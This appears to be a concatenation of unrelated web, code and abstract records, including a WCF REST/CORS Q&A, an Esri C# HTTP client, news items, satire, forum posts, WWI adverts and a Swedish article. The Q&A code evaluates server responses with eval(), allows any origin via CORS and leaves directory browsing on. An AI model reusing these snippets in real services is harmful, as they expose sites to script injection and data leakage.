<serviceHostingEnvironment multipleSiteBindingsEnabled="true" />
</system.serviceModel>
<system.webServer>
<modules runAllManagedModulesForAllRequests="true"/>
<!--
To browse web app root directory during debugging, set the value below to true.
Set to false before deployment to avoid disclosing web app folder information.
-->
<directoryBrowse enabled="true"/>
</system.webServer>
</configuration>
And my My Interface
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.Serialization;
using System.ServiceModel;
using System.ServiceModel.Web;
using System.Text;
namespace RestService
{
// NOTE: You can use the "Rename" command on the "Refactor" menu to change the interface name "IRestServiceImpl" in both code and config file together.
[ServiceContract]
public interface IRestServiceImpl
{
[WebInvoke(Method = "GET",
ResponseFormat = WebMessageFormat.Json,
BodyStyle = WebMessageBodyStyle.Wrapped,
UriTemplate = "getallemp")]
[return: MessageParameter(Name = "success")]
string GetAllEmployee();
}
}
and below is My Service Class
using System;
using System.Collections.Generic;
using System.Data;
using System.Linq;
using System.Runtime.Serialization;
using System.ServiceModel;
using System.Text;
using WebService.DataLayer;
namespace RestService
{
// NOTE: You can use the "Rename" command on the "Refactor" menu to change the class name "RestServiceImpl" in code, svc and config file together.
// NOTE: In order to launch WCF Test Client for testing this service, please select RestServiceImpl.svc or RestServiceImpl.svc.cs at the Solution Explorer and start debugging.
public class RestServiceImpl : IRestServiceImpl
{
public string GetAllEmployee()
{
cls_datalayer obj = new cls_datalayer();
DataTable dt = obj.getDataTableFromQuery("select usercode from users where empstatus='A'");
return ConvertDataTabletoString(dt);
}
public string ConvertDataTabletoString(DataTable dt)
{
System.Web.Script.Serialization.JavaScriptSerializer serializer = new System.Web.Script.Serialization.JavaScriptSerializer();
serializer.MaxJsonLength = 50000000;
List<Dictionary<string, object>> rows = new List<Dictionary<string, object>>();
Dictionary<string, object> row;
foreach (DataRow dr in dt.Rows)
{
row = new Dictionary<string, object>();
foreach (DataColumn col in dt.Columns)
{
row.Add(col.ColumnName, dr[col]);
}
rows.Add(row);
}
return serializer.Serialize(rows);
}
}
}
When i call this from browser its give From Browser
but when i try this from Ajax request using cross domain then i am getting error
$.ajax({
type: "GET",
url: 'http://localhost:59672/RestServiceImpl.svc/getallemp',
contentType: "application/json",
dataType: "jsonp",
cache: false,
jsonpCallback: 'callback',
success: function (data) {
alert();
},
error: function (xhr) {
//console.log(xhr);
var err = eval("(" + xhr.responseText + ")");
}
});
then i get error please check attachments Attachment 01
Attachment 02
A:
is worked better for me than the Web.config version:
Create a Global.asax
Add this code to the Global.asax.cs
protected void Application_BeginRequest(object sender, EventArgs e)
{
HttpContext.Current.Response.AddHeader("Access-Control-Allow-Origin" , "*");
if (HttpContext.Current.Request.HttpMethod == "OPTIONS")
{
HttpContext.Current.Response.AddHeader("Access-Control-Allow-Methods", "GET, POST");
HttpContext.Current.Response.AddHeader("Access-Control-Allow-Headers", "Content-Type, Accept");
HttpContext.Current.Response.AddHeader("Access-Control-Max-Age", "1728000");
HttpContext.Current.Response.End();
}
}
|
{
"pile_set_name": "StackExchange"
}
|
We won't be silenced. And Hillary Clinton will not be bullied by Trump, who is in lockstep with the NRA and its dangerous "guns everywhere" agenda. While this is a new spin on trying to intimidate a female gun violence prevention champion, it will fail, just as it has failed with Moms Demand Action volunteers across the country. It comes down to this: Our opponents are afraid someone will take away their guns. We are afraid our children will be shot and killed. You tell me who has more fight in them. The fact is that women are at the forefront of the gun safety movement and that’s no coincidence — women are disproportionately affected by weak gun laws. We represent 50% of victims of mass shootings and are put at risk by lax laws that make it far too easy for abusive partners to access a gun. Every month, more than 50 American women are shot to death by a current or former boyfriend or husband. We have to do better. I know that, and Hillary Clinton knows that too. That’s why we’ll continue to press for common sense solutions — like demanding a background check on every gun sale — that prove that we can respect the Second Amendment while making everyone safer.
|
{
"pile_set_name": "OpenWebText2"
}
|
2019-07-24T13:56:35+00:00
2019-07-24T13:56:35+00:00
2019-07-24T14:07:10+00:00.
By John Askounis/ info@eurohoops.net
At 34 years of age, Sofoklis Schortsanitis is determined to give it a go once more. Ionikos Nikaias AFFIDEA announced his addition to its Greek Basket League squad on Wednesday.
Schortsanitis was crowned EuroLeague champion back in 2014 with Maccabi Tel Aviv. However, a downfall followed.
He was the 34th pick of the 2003 NBA draft, but never made it to the NBA. He instead showcased his impressive strength in the paint all around Europe and in FIBA competitions with the Greek National Team.
His second stint with Maccabi brought him the EuroLeague title. He also captured three Super League championships and four Cups in Israel gaining the love of the fans up to this day.
Injuries and fitness issues have held him back recently, cutting his previous attempts for a comeback short during the 2017-18 season with Trikala. He hopes for a different outcome with Ionikos, a side that will return to Greece’s premium competition this season.
alm_page: 1alm_current: 1almitem: 1alm_found_posts: 1
|
{
"pile_set_name": "OpenWebText2"
}
|
/* See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* Esri Inc. licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Net;
namespace com.esri.gpt.csw
{
/// <summary>
/// CswClient class is used to submit CSW search request.
/// </summary>
/// <remarks>
/// CswClient is a wrapper class of .NET HttpWebRequest and HttpWebResponse. It basically submits
/// a HTTP request then return a text response.
/// </remarks>
///
public class CswClient
{
private CredentialCache _credentialCache;
static CookieContainer _cookieContainer; //use static variable to be thread safe
private String downloadFileName = "";
private bool retryAttempt = true;
#region Constructor
/// <summary>
/// Constructor
/// </summary>
public CswClient()
{
_credentialCache = new CredentialCache();
_cookieContainer = new CookieContainer();
}
#endregion
#region PublicMethods
/// <summary>
/// Submit HTTP Request
/// </summary>
/// <param name="method">HTTP Method. for example "POST", "GET"</param>
/// <param name="URL">URL to send HTTP Request to</param>
/// <param name="postdata">Data to be posted</param>
/// <returns>Response in plain text</returns>
public string SubmitHttpRequest(string method, string URL, string postdata)
{
return SubmitHttpRequest(method, URL, postdata, "", "");
}
/// <summary>
/// Submit HTTP Request
/// </summary>
/// <remarks>
/// Submit an HTTP request.
/// </remarks>
/// <param name="method">HTTP Method. for example "POST", "GET"</param>
/// <param name="URL">URL to send HTTP Request to</param>
/// <param name="postdata">Data to be posted</param>
/// <param name="usr">Username</param>
/// <param name="pwd">Password</param>
/// <returns>Response in plain text.</returns>
public string SubmitHttpRequest(string method, string URL, string postdata, string usr, string pwd)
{
String responseText = "";
HttpWebRequest request;
Uri uri = new Uri(URL);
request = (HttpWebRequest)WebRequest.Create(uri);
request.AllowAutoRedirect = true;
if(method.Equals("SOAP")){
request.Method = "POST";
request.Headers.Add("SOAPAction: Some-URI");
request.ContentType = "text/xml; charset=UTF-8";
}
else if (method.Equals("DOWNLOAD"))
{
request.Method = "GET";
}
else{
request.ContentType = "text/xml; charset=UTF-8";
request.Method = method;
}
// Credential and cookies
request.CookieContainer = _cookieContainer;
NetworkCredential nc = null;
String authType = "Negotiate";
if (_credentialCache.GetCredential(uri, authType) == null && _credentialCache.GetCredential(uri, "Basic") == null)
{
if (!String.IsNullOrEmpty(usr) && !String.IsNullOrEmpty(pwd))
{
nc = new NetworkCredential(usr, pwd);
_credentialCache.Add(uri, "Basic", nc);
_credentialCache.Add(uri, authType, nc);
}
else{
nc = System.Net.CredentialCache.DefaultNetworkCredentials;
_credentialCache.Add(uri, authType, nc);
}
}
request.Credentials = _credentialCache;
// post data
if (request.Method.Equals("POST", StringComparison.OrdinalIgnoreCase))
{
UTF8Encoding encoding = new UTF8Encoding();
Byte[] byteTemp = encoding.GetBytes(postdata);
request.ContentLength = byteTemp.Length;
Stream requestStream = request.GetRequestStream();
requestStream.Write(byteTemp, 0, byteTemp.Length);
requestStream.Close();
}
HttpWebResponse response = null;
try{
response = (HttpWebResponse)request.GetResponse();
}
catch (UnauthorizedAccessException ua)
{
if (retryAttempt)
{
PromptCredentials pc = new PromptCredentials();
pc.ShowDialog();
retryAttempt = false;
try
{
_credentialCache.Remove(uri, "Basic");
}
catch (Exception) { };
_credentialCache.Remove(uri, authType);
if (!String.IsNullOrEmpty(pc.Username) && !String.IsNullOrEmpty(pc.Password))
return SubmitHttpRequest(method, URL, postdata, pc.Username, pc.Password);
else
return null;
}
else
{
retryAttempt = true;
throw ua;
}
}
catch (WebException we)
{
if (retryAttempt)
{
PromptCredentials pc = new PromptCredentials();
pc.ShowDialog();
retryAttempt = false;
try
{
_credentialCache.Remove(uri, "Basic");
}catch(Exception){};
_credentialCache.Remove(uri, authType);
if (!String.IsNullOrEmpty(pc.Username) && !String.IsNullOrEmpty(pc.Password))
return SubmitHttpRequest(method, URL, postdata, pc.Username, pc.Password);
else
return null;
}
else
{
retryAttempt = true;
throw we;
}
}
if (_cookieContainer.GetCookies(uri) == null)
{
_cookieContainer.Add(uri, response.Cookies);
}
Stream responseStream = response.GetResponseStream();
if (method.Equals("DOWNLOAD"))
{
FileStream file = null;
string fileName = response.GetResponseHeader("Content-Disposition");
string[] s = null;
if (fileName.ToLower().EndsWith(".tif"))
{
s = URL.Split(new String[] { "coverage=" }, 100, StringSplitOptions.RemoveEmptyEntries);
s[1] = s[1].Trim() + ".tif";
}
else
{
s = fileName.Split('=');
s[1] = s[1].Replace('\\', ' ');
s[1] = s[1].Replace('"', ' ');
s[1] = s[1].Trim();
}
try
{
downloadFileName = System.IO.Path.Combine(Utils.GetSpecialFolderPath(SpecialFolder.ConfigurationFiles), s[1]);
System.IO.File.Delete(downloadFileName);
file = System.IO.File.Create(downloadFileName);
// Buffer to read 10K bytes in chunk:
byte[] buffer = new Byte[10000];
int length = 10000;
int offset = 0;
while (length > 0)
{
length = responseStream.Read(buffer, 0, length);
offset += length;
file.Write(buffer, 0, length);
}
}
catch (Exception e)
{}
finally
{
if(file != null)
file.Close();
if(responseStream != null)
responseStream.Close();
retryAttempt = true;
}
return downloadFileName;
}
StreamReader reader = new StreamReader(responseStream);
responseText = reader.ReadToEnd();
reader.Close();
responseStream.Close();
return responseText;
}
/// <summary>
/// Encode PostBody
/// </summary>
/// <remarks>
/// Encode special characters (such as %, space, <, >, \, and &) to percent values.
/// </remarks>
/// <param name="postbody">Text to be encoded</param>
/// <returns>Encoded text.</returns>
public string EncodePostbody(string postbody)
{
postbody = postbody.Replace(@"%", @"%25");
postbody = postbody.Replace(@" ", @"%20");
postbody = postbody.Replace(@"<", @"%3c");
postbody = postbody.Replace(@">", @"%3e");
postbody = postbody.Replace("\"", @"%22"); // double quote
postbody = postbody.Replace(@"&", @"%26");
return postbody;
}
#endregion
}
}
|
{
"pile_set_name": "Github"
}
|
Все купоны (8819) 3366299 Есть жалобы или комментарии по этому месту? Оставьте свой (0). Рекомендуем организации Квест Сундук Мертвеца Nirvana.
Летуаль кэшбэк польза!
Чтобы получить кэшбэк внимательно читайте правила. Например, перед покупкой стоит отключить блокировщик рекламы, если он у Вас установлен, а также.
|
{
"pile_set_name": "OpenWebText2"
}
|
Background: START, a Study of Trauma and Reduction of HIV Transmission, is a cross-sectional study that will examine whether traumatic stress contributes to potentially amplified transmission (PAT) risk behavior (the co-occurrence of detectable HIV viral load and HIV transmission risk) among stimulant-using men who have sex with men (MSM). Stimulant-using MSM are most heavily affected by HIV, despite the widespread availability of antiretroviral therapy (ART).1 Treatment as Prevention (TasP), defined as expanded ART access to achieve sustained viral suppression, is a promising biomedical prevention approach that will be utilized. While literature supports that early ART initiation decreases HIV transmission rates, stimulant-using MSM were excluded from these landmark trials. Stimulant-using MSM are known for low utilization and low engagement in HIV-related care thereby resulting in higher viral loads and high HIV transmission rates.2 The overarching objective of this proposed study is to identify modifiable risk factors associated with PAT to inform the development of innovative, theory-based interventions to optimize the effectiveness of TasP in stimulant-using MSM. Resulting information will inform the development of HIV/AIDS prevention approaches enhancing the effectiveness of TasP in stimulant-using MSM, thereby decreasing HIV transmission rates. Relation to Training: This proposal is designed to provide in-depth research training. Pathway analysis will be conducted to understand the role of psychosocial factors in the relationship between traumatic stress and PAT. The results will provide preliminary data for the preparation of a K99/R00 grant, which will be used to develop and pilot test a behavioral intervention to reduce traumatic stress symptoms and HIV transmission in stimulant- using MSM. This F31 proposal is a logical step in becoming an independent nurse investigator. Innovation: The study is innovative in three ways. First, PAT, a co-occurring outcome variable, will be utilized to model an outcome most closely linked with high HIV-viral transmission efficiency; second, the potential mediational role of psychosocial factors in the relationship between traumatic stress and PAT will be explored; and third, novel techniques will be utilized, including (a) the Balloon Analogue Risk Task (BART) measure of impulsivity while eliminating the limitation of a self-report measure requiring self-insight and awareness, and (b) Audio Computer Assisted Self Interviewing (ACASI), which is used in behavioral research to minimize recall and social desirability bias and enhance the veracity of self-report, thereby increasing internal and external validity.
|
{
"pile_set_name": "NIH ExPorter"
}
|
The Banner Saga composer faces $50,000 fine for his work on the game
Austin Wintory—composer for games Journey and The Banner Saga—is facing a fine of up to $50,000 as a result of his work on Stoic's Viking RPG. According to Wintory, his union, the American Federation of Musicians, have charged him for working on the game's soundtrack with non-union musicians. Earlier this week, Wintory released a video, explaining the charges and setting out what he calls an "untenable situation".
The threat can be traced back to a contract drawn up by the AFM two years ago. That contract—which Wintory says wasn't voted on by AFM members—was universally rejected by game makers. Effectively, AFM members have been blocked from working on games since the contract's introduction.
|
{
"pile_set_name": "Pile-CC"
}
|
1. Field of the Invention
The invention is directed towards a shadow mask back ring structure for use in color television picture tubes.
2. Description of the Prior Art
A shadow mask is an apertured, curved conductive member, which operates as the electron beam limiting electrode in a color television picture tube. An example of the typical shadow mask structure is seen in U.S. Pat. No. 3,639,799. The shadow mask typically has a curved aperture face portion surrounded by a solid skirt portion which is bent in a direction normal to the face portion of the shadow mask. This type of mask is typically formed of relatively thin metal to minimize the weight of the structure, and also to minimize thermal effects. It has been the practice to utilize a relatively thicker unitary metal reinforcing ring which is rigidly affixed to the back end of the mask shirt portion to strengthen and stabilize the shadow mask. It has been found necessary to use a unitary reinforcing ring to achieve the desired strength, and to avoid distortion due to nonsymmetrical thermal heating.
In preparing such a unitary reinforcing ring, it has been the practice to stamp such rings from large metallic sheets. This structure and fabricating process results in significant scrap losses, and thus is an expensive, high waste production process.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
The US Commodities and Futures Trading Commission (CFTC) revealed a new fintech initiative today that will find the regulator seeking to increase its participation in the ongoing global R&D effort related to blockchain and distributed ledger tech.
As part of a sweeping CFTC 2.0 proposal, the US options and futures regulator is launching LabCFTC, a fintech initiative that will seek to bolster the pace at which the regulator assesses new technologies. The aim, according to the CFTC, is to become “more accessible” to innovators working on new financial technologies through the program.
The CFTC also made public a LabCFTC component called GuidePoint, both an online tool that will provide a point of contact for entrepreneurs, and a physical location in New York where they can find an open door for such guidance, and “CFTC 2.0”, described as an initiative to foster and help initiate the adoption of new technology within the agency.
In statements today at the New York FinTech Innovation Lab, Chairman Christopher Giancarlo characterized the mission as one that would seek to explore new technologies including AI, machine learning and DLT.
In particular, he cited advances such as “smart contracts that value themselves and calculate payments in real-time” and “distributed ledger technology, more commonly known as blockchain” as innovations that will challenge the financial infrastructure today.
Giancarlo said of the program:
“We will look to explore ways to use fintech to enhance CFTC functions and duties. For example, we might collaborate with other authorities on leading development of best practices to support the development of ‘regulator nodes’ on distributed ledgers, or experiment with collecting or distributing existing CFTC reports through blockchain technology.”
As evidence of the need for action, Giancarlo cited the speed at which other enabling technologies – including automated trading – have reshaped modern financial markets and put new stress on regulators.
“The world is changing. Our parents’ financial markets are gone. The 21st century digital transformation is well underway,” he remarked.
Such a move finds the CFTC emerging as one of the more active global regulators when it comes to conceiving how it will respond to the advent of distributed ledger solutions.
Among the more active jurisdictions globally include Japan, where the legislature has passed national regulations aimed at cryptocurrencies, and Mauritius and Malta, which have recently announced initiatives aimed at providing clarity to regional innovators.
Washington, DC image via Shutterstock
|
{
"pile_set_name": "OpenWebText2"
}
|
Marguerita Hagan: Wildlife & La Mer
Page Content
March 2, 2017 - October 15, 2017
Between Terminals C and DTicketed Passengers
Philadelphia artist
Marguerita Hagan is known for her ceramic sculpture inspired by the
fantastical design and exquisite beauty of marine life. From diatoms –
microscopic single-celled organisms – to giant blue whales, Hagan recreates the
intricate aesthetics of oceanic life that she describes as “constantly
perfecting itself for each unique environment.”
Hagan’s ceramic series
emulates the complex underwater ecosystem and its extraordinary sea creatures.
Her colorful convex circular forms that she refers to as shields are based on a
variety of aquatic species. The wall-mounted circular domes offer a lens into
the magnificent patterns and textures that swim underneath the water.
Similarly, Hagan’s all-white
forms delve into the exotic intricacy and diversity of the single-celled creatures
that populate the ocean from its deep abyss to the sunlit zone. These
remarkably designed single-celled organisms photosynthesize more than half of
earth’s oxygen. Hagan has said, “The intricate ceramic marine forms in white
shine light on the wonder as well as the delicate, diverse, and mostly unseen
life of the sea with which our lives are intrinsically linked.” Hagan’s
sculpture celebrates the visual aesthetics of the ocean and “aims to bring more
awareness to the environmental issues surrounding our vital relationship with
it.”
|
{
"pile_set_name": "Pile-CC"
}
|
Bovine cathepsins S and L: isolation and amino acid sequences.
The purification procedure of cathepsin S includes acid activation of spleen homogenate, incubation at 37 degrees C, precipitation with (NH4)2SO4 in H2O/tert-butanol medium, gel chromatography, chromatofocusing, covalent chromatography and cation chromatography of FPLC system. Cathepsin S has a M(r) of about 24,000 Da with pI of 6.5 and 6.8. The mixture of both forms gave a single sequence. Cathepsin L was purified from bovine kidney by acid treatment and incubation of 37 degrees C, precipitation by (NH4)2SO4, two ion exchange chromatographies on CM-Sephadex, gel chromatography and ion exchange chromatography on FPLC system. Cathepsin L exists in multiple forms with pI 5.3-5.7 and M(r) of about 29,000 Da. N-terminal amino acid sequence confirms that cathepsin L and cathepsin S are different enzymes.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
The Top 5 Ways the Jones Act has left Honolulu Vulnerable to the Zombie Apocalypse
There has been a lot written about the harm caused by the Jones Act. On this very site, we’ve explored how the restrictive cabotage provision drives up the price of goods and contributes to Hawaii’s high cost of living. But while the Act certainly impacts the people of Hawaii on a day-to-day basis, there’s one element that no one is talking about:
The Jones Act has left Hawaii vulnerable to the Zombie Apocalypse.
It’s the dirty secret that no one in the state has uncovered … until now. Too many of Hawaii’s political leaders have been under the thumb of pro-Jones Act lobbyists like Big Zombie. But unless we take decisive action, you may find yourself cursing the price of nails while you search for materials to board up your windows.
Therefore, in the interest of preventing our state nickname from changing from “the Aloha State” to “Braaaaaiiiinnns” we present the top five ways that the Jones Act has made it more difficult for our citizens to fend off a zombie attack.
We joke about the high price of living in paradise, but what about when skyrocketing energy costs force you to choose between taking refuge in a stifling house or watching a desiccated zombie hand grope its way through your open window? The Jones Act currently prevents affordable access to Liquid Natural Gas (LNG), which would help lower our energy bills. When you’re frantically chopping off zombie fingers and trying to reinforce the window screen, you’ll wish the Legislature had sought an exemption.
4. No ferry system to help us escape to (or gather help from) the other islands after the infrastructure collapses and the airport is overrun.
So you’ve put together a small, but hardy band of survivors and fought your way to the airport, only to see the only guy who knows how to fly get bitten when he inexplicably wandered off by himself to use the bathroom and/or meditate on the human condition. As you use one of your precious remaining bullets to put him out of his misery, you’ll wish there was some other major mode of public transport that could get you off the island. (After all, you had heard rumors that Kauai is zombie-free, and one of your group has received a few ham radio signals from a sanctuary in Maui.) If only the Jones Act didn’t bar the existence of an inter-island ferry system. Then you and your group could fight your way to the pier and make your escape to one of the other islands. (Assuming, of course, that you’ve already ascertained that your ferry driver is also bite-free. You’re not rookies anymore.)
3. You will inevitably find yourself with people who—despite being quite aware of the danger that surrounds them—will constantly let their guard down at the worst moment and get bitten, forcing you to face the death of your friends and companions on a near-constant basis.
O.k., this technically isn’t the fault of the Jones Act, but I think we can all agree that it is very, very annoying. Especially when even a child could outrun the average zombie. Seriously, how do zombies catch people? And why don’t people double-knot their shoes and close doors behind them?
2. Significant barriers to the creation of makeshift zombie-slaying weapons.
Ammunition is precious in the Zombie Apocalypse. Assuming that you haven’t been so unfortunate as to end up with super fast rage zombies, but are instead facing the more conventional slow-trudging variety, you’ll want to save your bullets by constructing a number of makeshift traps and weapons to kill the zombie invaders. If you’re especially cool, you might also want to dispatch the zombies with a katana. (Warning: If you’re not sure you’re cool enough to kill zombies with a sword, it is suggested you stick with more conventional weaponry, such as a baseball bat studded with spikes. Nothing is more pathetic than someone who can’t pull off awesome samurai moves trying to kill hordes of zombies with a katana. You may end up being the first to learn whether zombies can laugh at you. Before they eat your brains.)
Unfortunately, the Jones Act presents a serious bar to the creation of makeshift zombie-killing weapons and traps. We are forced to pay a premium for the supplies to be shipped from the mainland and—as anyone who has been involved in a building project on an outer island can tell you—that’s when the supplies are there at all. Nothing could be more disheartening than learning that the red paint you need to leave vague, disquieting messages on your house for passers-by is going to be two weeks late and 30% more expensive than you thought. And all that time spent honing your katana moves will be for naught when you realize that the ship from Japan you heard about is bypassing Hawaii because the Jones Act requires it to unload in California.
1. The high cost of food will lead to the formation of scavenging bands of raiders and possible cannibal enclaves.
Ever gripe about the high cost of cereal or lunch meat? Every day, right? Well just imagine how much worse it will be during the Zombie Apocalypse. In fact, most of your daily existence will be spent scavenging for food and trying to remember to check behind half-closed doors before ransacking someone’s pantry. (Don’t worry. That thump you heard was only the cat. Or a zombie trapped in the basement. Pro tip: Don’t investigate it. Just make sure the doors are closed.)
You may think that you can solve this problem by pooling together to start a farm or seeking out other survivors who are better situated. But if we’ve learned anything from fiction, it’s that your small garden will inevitably be attacked by scavenging bands of raiders. And then again by zombies. Trying to find other communities will only lead you into situations where you are suddenly under the thumb of a charismatic local psychopath, or have run into a group that has taken to cannibalism with a startling rapidity and comfort.
If only the Jones Act didn’t make food so expensive in Hawaii. Then you could relax in your own barricaded home with your plentiful supply of hoarded foodstuffs, safe from the chaos outside.
Because we all know that in the Zombie Apocalypse, people are the real monsters. And so are the zombies. And also the Jones Act.
Subscribe to our newsletter!
Get updates on what we're doing to make Hawaii affordable for everyone.
|
{
"pile_set_name": "Pile-CC"
}
|
i absolutely love how involved russell is in the community. he seems to really love the seattle area and to understand that we havent had a real sports hero here in quite a while. stoked hes stepping up and filling that hole.
That's Max Browne, aka Peyton Manning clone Max Browne. I didn't even know about the Manning comparisons when I first saw him and within 5 seconds I thought "he throws and steps EXACTLY like Manning does."
Saw that happen on the local news. Pretty cool story. And the ceiling is very high for Browne. He's got a very good chance at a wonderful college and NFL career. Too bad it's not going to be as a Seahawk.
"The ultimate number is W's, and that’s what matters in Santa Clara. As such, Jed York does not own the 49ers; Russell Wilson does." - Paul Gutierrez
Seahawk Sailor wrote:Saw that happen on the local news. Pretty cool story. And the ceiling is very high for Browne. He's got a very good chance at a wonderful college and NFL career. Too bad it's not going to be as a Seahawk.
You never know...it could be...he's got at least 4 years to go in college and Russell is going to eventually need an heir apparent no matter how young he is now. I for one don't want to see Seattle scrambling to find a franchise QB when Wilson is done winning super bowls and finally hangs up those cleats.
“There’s no reason, with Mr. Allen and the fan base here and the stadium, that this can’t be a stable, long-term winning organization.” - John Schneider
Seahawk Sailor wrote:Saw that happen on the local news. Pretty cool story. And the ceiling is very high for Browne. He's got a very good chance at a wonderful college and NFL career. Too bad it's not going to be as a Seahawk.
You never know...it could be...he's got at least 4 years to go in college and Russell is going to eventually need an heir apparent no matter how young he is now. I for one don't want to see Seattle scrambling to find a franchise QB when Wilson is done winning super bowls and finally hangs up those cleats.
And do you really think that the Hawks are going to be in position to Draft a person of this caliber in four years?Never happen! I expect us to be Drafting at #25 of lower from now on!!! Well....I suppose that someone could give us their #1 for Flynn.
That struck me as funnyier than hell,,,,BUT,,,,notice the difference in the size of their hands?, Oh...My.. God.!!!I really hope this kid kicks ass @ SC, he seems to have the humility it takes to succeed
|
{
"pile_set_name": "Pile-CC"
}
|
Tag: Adverts
Would an advert like this, as featured in the Bromley & District Times in July 1918, made you go out and buy Cyder to quench your thirst on these warm summer days? According to Minchew’s Real Cyder & Perry, there is a difference between Cider and Cyder. Cyder is rarely made on a commercial scale, whereas Cider is. Cyder is made from a single pressing of vintage fruit, rather like “extra virgin” olive oil. Cider, the drink almost given to agricultural labourers well into living memory, was made from the cyder pulp being re-pressed at the rate of 10…
No sum can be too large! Another example of an advert, often seen in local newspapers, encouraging local people to invest ‘every shilling’ they could, so they can buy their towns ‘own’ gun to help their boys on the Front line, by investing in National War Bonds and War Savings Certificates to help pay for the war. FIRE your Money at the Huns Join the throngs of patriotic investors who all this week have been hurrying to lend their money to their country. Draw out your savings and buy War Bonds. Back up…
Adverts like this one from the Bromley & District Time (31st May 1918, page 6) appeared in local newspapers advertising for woman to join the British Army in roles such as cooks, waitresses and clerks. The supreme test of British Womanhood comes now The British Army Urgently requires 5000 Women clerks You will be trained FREE and paid during training – and you enrol for the duration of the war in Queen Mary’s Army Auxiliary Corps
An advert which appeared in the Bromley & District Times on the 24th May 1918 (page 6), advertising for the women of Britain to help with home service during the war. Women of Britain Will you come and cook for the men who are defending you and your home? 7,000 Cooks and waitresses are wanted now for home service only with the Queen Mary’s Army Auxiliary Corps. Cooks and waitresses also required for service overseas. Fill in this form, then cut out the advert and send to Ministry of…
In 1918, the British government set out new laws introducing the rationing of certain food; Sugar, meat, flour, butter, margarine and milk, as a way of sharing food equally. However, as this advert shows from World Stores (who had branches at 50 East Street, Bromley and 41 High Street, Orpington), from the Bromley & District Times on 17th May 1918 (page 6), certain foods did not require a ration card to be purchased. NO RATION CARD REQUIRED for any of the the following:- (equal to Meat in food value) Spaghetti (in tomato…
Dame Clara Ellen Butt, DBE (1 February 1872 – 23 January 1936) was an English contralto. Her main career was as a recitalist and concert singer. Her voice, both powerful and deep, impressed contemporary composers such as Saint-Saens and Elgar; the latter composed a song-cycle with her in mind as soloist. Butt appeared in only two operatic productions, both of Gluck’s Orfeo ed Euridice. Later in her career she frequently appeared in recitals together with her husband, the baritone Kennerley Rumford. She made numerous recordings for the gramophone. Advert featured in the Bromley…
During World War 1 a Women Committee was set up as there was concern about girls canoodling with the soldiers, and soldiers corrupting local girls. Consequently women were encouraged to join the street patrols in particular areas where girls and men might ‘enjoy’ a little ***. The War Office gave permission for these patrols to take place outside military camps and were also very active in public parks and cinemas. It was the Women’s Patrol Committee who recommended that lights were not dimmed between films! This, at a time when…
How times have changed. I doubt very much that you would see an advert like this in the local newspaper today suggesting giving your son a new suit for Easter, but this is exactly what Issac Walton and Co. promoted for Easter in 1918. At least the models looked very pleased with their new suits!
So if you walking around the shops in 1918, these would have been the fashion statements that were on offer to you from top retailers such as Sainsbury’s – so elegant! Taken from the Bromley & District Times, 22nd March 1918
|
{
"pile_set_name": "Pile-CC"
}
|
I januari 2019 hade masterprogrammet i ABM (arkiv, bibliotek och museer) vid Uppsala universitet ett panelsamtal där lärare svarade på studenternas frågor. En grupp hade läst i litteraturen att det kan vara svårt att hitta information om ras i gamla kataloger i arkiv samt på museer och bibliotek. De undrade vad de skulle göra i sådana situationer.
Inga-Lill Aronsson, lektor i musei- och kulturarvsvetenskap, svarade. Hon pratade först om pedagogiska aspekter i mötet med besökare inom ABM-sektorn, och sa att studenterna skulle söka på det aktuella ordet.
– Sedan sa jag: ”Låt oss ta det kontroversiella ordet”, och gjorde misstaget att uttala hela n-ordet. Jag tänkte i termer av klassifikation och gamla katalogsystem.
Hon menar att det enda sättet att handskas med ett mörkt kulturarv är att titta på vad som finns i gamla arkiv.
– Vi måste lägga fram ord, handlingar och forskning på bordet och diskutera det. Då måste man uttala vissa ord.
”Ingen rätt att använda ordet”
Efteråt mejlade fyra studenter till institutionen. De ansåg att ordet saknade relevans i sammanhanget och att Inga-Lill Aronsson inte hade rätt att använda det eftersom hon varken är svart eller rasifierad.
– Vi hajade till. Det är ett extremt laddat ord, som det, enligt min uppfattning, finns en konsensus kring att det inte är okej att använda. Det satt också tydligt rasifierade människor i salen. Vi reagerade mest på att ingen av lärarna reagerade, säger en av studenterna till Universitetsläraren.
Kallades till möte
Institutionen inledde en utredning om trakasserier, där Inga-Lill Aronsson kallades till möte med institutionsledningen och universitetets likavillkorsspecialist.
– Det fanns ingen förståelse för kontexten, mötet handlade om att jag skulle förklaras klandervärd. Jag bad sedan att få stå över kommande undervisning med gruppen, av respekt för studenternas känslor, säger hon.
Reine Rydén, ställföreträdande prefekt, uppfattade mötet som konstruktivt. De gick igenom universitetets regelverk, berättade att institutionen ansåg att ordvalet var olämpligt och Inga-Lill Aronsson gav sin syn på saken.
– Kontexten var relevant. Men det går att diskutera problematiken kring känsliga ord i gamla kataloger utan att uttala orden, säger han.
Läs också ”Otydlig gräns mellan hänsyn och självcensur”.
FAKTA / Yttrandefrihet och diskriminering
Enligt regeringsformen är var och en fri att uttrycka tankar, åsikter och känslor i tal, skrift, bild eller på andra sätt. Yttrandefriheten begränsas dock av ett antal punkter. Yttrandefrihetsbrott kan till exempel handla om förolämpning, att uttala sig nedsättande eller bete sig förödmjukande mot någon annan i syfte att kränka hens självkänsla eller värdighet. Man får inte heller ägna sig åt förtal, att någon ”utpekar någon annan som brottslig eller klandervärd i sitt levnadssätt eller annars lämnar en uppgift som är ägnad att utsätta denne för andras missaktning.”
Hets mot folkgrupp innebär att någon ”hotar eller uttrycker missaktning för en folkgrupp eller en annan sådan grupp av personer med anspelning på ras, hudfärg, nationellt eller etniskt ursprung, trosbekännelse, sexuell läggning eller könsöverskridande identitet eller uttryck.”
